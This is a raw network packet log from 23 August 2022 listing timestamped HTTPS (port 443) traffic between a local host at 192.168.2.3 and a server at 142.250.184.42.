Aug 23, 2022 03:43:41.969373941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969409943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969444990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969479084 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969516993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969552040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969587088 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.969589949 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969630957 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969667912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969705105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969739914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969774961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969811916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969811916 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.969851971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969888926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969924927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969959974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969995975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970014095 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.970032930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970068932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970104933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970143080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970181942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970220089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970254898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970293045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970334053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970367908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970400095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970427990 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.970442057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970485926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970525980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970563889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970599890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970609903 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.970637083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970674038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970710039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970746040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970782995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970799923 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.970822096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970860958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970897913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970935106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970973969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.970985889 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.971014023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971050024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971086025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971121073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971158028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971194983 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971266031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971301079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971334934 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.971338987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971404076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971440077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971473932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971508026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971528053 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.971544981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971580982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971621037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971658945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971694946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971726894 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.971733093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971767902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971802950 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971838951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971873045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971909046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971946001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.971983910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972021103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972054958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972090006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972129107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972163916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972202063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972238064 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972239971 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.972278118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972321033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972368002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972410917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972454071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972465992 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.972496033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972537994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972579002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972615957 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972646952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972666979 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.972687960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972732067 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972769022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972806931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972846985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972886086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972923040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972959995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.972995996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973031998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973047018 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.973072052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973113060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973150969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973186970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973222017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973233938 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.973258018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973294020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973331928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973376036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973417044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973421097 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.973453999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973493099 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973529100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973563910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973598957 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973603964 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.973635912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973671913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973706007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973741055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973777056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973810911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973845959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973881960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973917961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973925114 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.973956108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.973989964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974025965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974062920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974097967 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974107027 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.974137068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974174023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974209070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974294901 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.974296093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974334955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974371910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974406958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974443913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974478960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974514961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974550962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974586964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974613905 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.974625111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974661112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974695921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974731922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974766016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974798918 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.974802017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974838018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974873066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974908113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974941969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974977016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.974977970 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.975016117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975050926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975086927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975121975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975158930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975193977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975229025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975265026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975298882 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.975303888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975346088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975408077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975442886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975475073 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.975482941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975524902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975567102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975606918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975646973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975661993 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.975684881 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975724936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975761890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975801945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975878954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975923061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975961924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.975982904 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.976001978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976037025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976073980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976114988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976155043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976165056 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.976186991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976216078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976243973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976279974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976308107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976336002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976350069 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.976362944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976403952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976434946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976464033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976490974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976520061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976538897 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.976547956 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976578951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976608992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976635933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976663113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976691008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976716995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976743937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976772070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976799011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976826906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976852894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976856947 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.976881981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976910114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976937056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976963997 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.976990938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977018118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977046013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977049112 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.977072954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977101088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977130890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977158070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977185965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977215052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977241993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977263927 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.977271080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977298021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977324963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977360964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977389097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977417946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977447033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977474928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977504015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977530956 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977559090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977586031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977612019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977644920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977660894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977678061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977694988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977710962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977727890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977744102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977760077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977777004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977793932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977812052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977828979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977845907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977863073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977880955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977896929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977916002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977932930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977950096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977967024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977982998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.977994919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978007078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978018045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978033066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978050947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978111029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978131056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978149891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978166103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978178978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978190899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978208065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978225946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978244066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978260994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978276968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978296041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978312016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978327990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978343964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978360891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978378057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978394985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978410959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978427887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978445053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978461027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978477001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978493929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978518963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978547096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978560925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978578091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978595018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978611946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978629112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978646040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978662968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978679895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978696108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978714943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978730917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978749037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978765965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978782892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978799105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978816986 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978832960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978849888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978866100 CEST	443	64969	142.250.184.42	192.168.2.3
